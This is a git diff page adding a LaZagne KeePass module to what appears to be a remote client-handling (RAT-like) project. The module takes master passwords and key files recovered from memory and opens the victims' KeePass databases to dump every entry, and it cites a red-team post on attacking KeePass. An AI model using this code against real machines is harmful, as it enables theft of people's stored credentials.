diff options
author | AL-LCL <alvin@alvinhavel.com> | 2023-05-19 11:01:49 +0200 |
---|---|---|
committer | AL-LCL <alvin@alvinhavel.com> | 2023-05-19 11:01:49 +0200 |
commit | 20dbeb2f38684c65ff0a4b99012c161295708e88 (patch) | |
tree | a5b8445f55da2fbbb92443b68e9d7354a290c598 /foreign/client_handling/lazagne/softwares/memory/keepass.py |
Diffstat (limited to 'foreign/client_handling/lazagne/softwares/memory/keepass.py')
-rw-r--r-- | foreign/client_handling/lazagne/softwares/memory/keepass.py | 31 |
1 files changed, 31 insertions, 0 deletions
diff --git a/foreign/client_handling/lazagne/softwares/memory/keepass.py b/foreign/client_handling/lazagne/softwares/memory/keepass.py new file mode 100644 index 0000000..4df5b84 --- /dev/null +++ b/foreign/client_handling/lazagne/softwares/memory/keepass.py @@ -0,0 +1,31 @@ +# -*- coding: utf-8 -*- +# Thanks to the awesome work done by harmjoy +# For more information http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/ + +# Thanks for the great work of libkeepass (used to decrypt keepass file) +# https://github.com/phpwutz/libkeepass + +import traceback + +from . import libkeepass +from foreign.client_handling.lazagne.config.constant import constant +from foreign.client_handling.lazagne.config.module_info import ModuleInfo + + +class Keepass(ModuleInfo): + def __init__(self): + ModuleInfo.__init__(self, 'keepass', 'memory') + + def run(self): + # password found on the memory dump class + if constant.keepass: + res = [] + for db in constant.keepass: + try: + with libkeepass.open(db.values()[0][u'Database'], + password=db.get(u"KcpPassword", {}).get(u'Password'), + keyfile=db.get(u"KcpKeyFile", {}).get(u'KeyFilePath')) as kdb: + res.extend(kdb.to_dic()) + except Exception: + self.debug(traceback.format_exc()) + return res |